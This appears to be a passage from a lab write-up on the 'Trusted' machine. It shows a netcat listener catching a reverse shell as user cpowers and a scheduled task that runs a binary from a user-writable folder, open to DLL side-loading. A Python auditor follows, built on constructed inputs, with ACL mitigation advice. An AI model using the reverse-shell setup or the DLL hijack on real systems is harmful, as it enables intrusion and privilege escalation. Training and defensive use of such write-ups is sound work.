┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ nc -nlvp 2222
listening on [any] 2222 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.192.230] 51759
Microsoft Windows [Version 10.0.20348.887]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
lab\cpowers

C:\Windows\system32>
The scheduled task below was running as user cpowers every minute:
C:\Users\cpowers\Documents>type task.ps1
type task.ps1
Get-Process "KasperskyRemovalTool" | Stop-Process -Force
Start-Process -FilePath "C:\AVTest\KasperskyRemovalTool.exe"

C:\Users\cpowers\Documents>
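The task above starts a binary out of a directory that an ordinary domain user can write to, and that binary loads a DLL by name which is not present next to it, so the first writable location in the DLL search order decides what gets loaded in cpowers' context. As an added example (not from the write-up), the Python below computes, for a scheduled task's executable and the DLL names it imports, which search-order location Windows would consult first and whether a non-admin could plant a file there. The exe path and DLL name mirror the page; the file inventory, the writable directories and the working directory are constructed inputs, and the search order is the documented default with SafeDllSearchMode on.

```python
"""Audit a scheduled task's executable for DLL side-loading exposure.
Added example: the task path and DLL name come from the write-up, the
file inventory and ACL facts are constructed, not read from a live host."""
import ntpath


def dll_search_order(exe_path, system_root="C:\\Windows", cwd=None, path_dirs=()):
    """Default search order (SafeDllSearchMode on) for a DLL that is neither
    a KnownDLL nor already loaded: application directory, System32, the
    16-bit System directory, the Windows directory, the current directory,
    then each PATH entry."""
    order = [
        ntpath.dirname(exe_path),
        ntpath.join(system_root, "System32"),
        ntpath.join(system_root, "System"),
        system_root,
    ]
    if cwd:
        order.append(cwd)
    order.extend(path_dirs)
    return order


def _norm(path):
    return path.lower().rstrip("\\")


def hijack_candidates(exe_path, dll_names, existing_files, writable_dirs, **search_kw):
    """For every DLL name, return the first search location that a
    low-privileged user can write to and that Windows consults before any
    directory actually holding the DLL.  A hit means a user-planted file
    would be loaded into the task's process."""
    existing = {_norm(p) for p in existing_files}
    writable = {_norm(d) for d in writable_dirs}
    hits = {}
    for dll in dll_names:
        for directory in dll_search_order(exe_path, **search_kw):
            candidate = ntpath.join(directory, dll)
            if _norm(candidate) in existing:
                break  # the genuine DLL is found here; later directories are never consulted
            if _norm(directory) in writable:
                hits[dll] = candidate
                break
    return hits


# Constructed scenario mirroring the page: the task binary in C:\AVTest,
# one DLL that exists nowhere and one that lives in System32.
TASK_EXE = "C:\\AVTest\\KasperskyRemovalTool.exe"
TASK_DLLS = ["KasperskyRemovalToolENU.dll", "version.dll"]
INVENTORY = ["C:\\Windows\\System32\\version.dll"]          # constructed
USER_WRITABLE = ["C:\\AVTest", "C:\\Users\\cpowers\\Documents"]  # constructed ACL result


def audit_task(writable_dirs=USER_WRITABLE, cwd=None):
    """Run the check for the page's task with a given set of writable directories."""
    return hijack_candidates(TASK_EXE, TASK_DLLS, INVENTORY, writable_dirs, cwd=cwd)


if __name__ == "__main__":
    for dll, path in audit_task().items():
        print(f"{dll}: a non-admin can plant {path}")
```

With C:\AVTest writable, both the missing ENU DLL and version.dll are exposed, because the application directory is searched first for everything that is not a KnownDLL; tightening the ACL on C:\AVTest leaves only the working directory of the task (if it is user-writable) as a location for the DLL that exists nowhere, and nothing at all once that is fixed too. Keeping scheduled tasks that run as privileged accounts out of user-writable directories is the fix the audit points at.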
That's all.